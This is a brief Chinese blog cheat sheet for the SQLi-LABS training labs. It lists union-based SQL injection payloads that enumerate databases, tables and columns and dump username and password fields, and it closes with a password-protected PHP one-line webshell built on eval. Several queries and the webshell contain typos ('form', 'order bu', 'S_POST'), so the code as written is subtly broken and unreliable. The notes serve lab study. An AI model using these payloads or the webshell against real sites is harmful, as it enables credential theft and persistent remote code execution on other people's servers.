sql注入注入指南
sql注入
课程来自于
SQLi-LABS 1-4 mysql基本语句:
查库:select group_concat(schema_name) form information_schema.schemata
group_concat()---避免列举
查表:select table_name form information_schema.tables where table_schema=‘表名’
查列:select column_name form information_schema.columns where table_name='列名'
查字段:select username,password,id from security.表名
判断几列:order bu n;
回显:union select 1,2,3--+
补充:
group_concat()详解
回显示范:
SQLi-LABS 5 mysql语句补充
对于security数据库
如SQLi-LABS 5 二分法判断
SQLi-LABS 7知识补充
一句话木马:php版本:<?php @eval(S_POST["crow"]);?>其中crow是密码
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 loekr
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
Steam卡片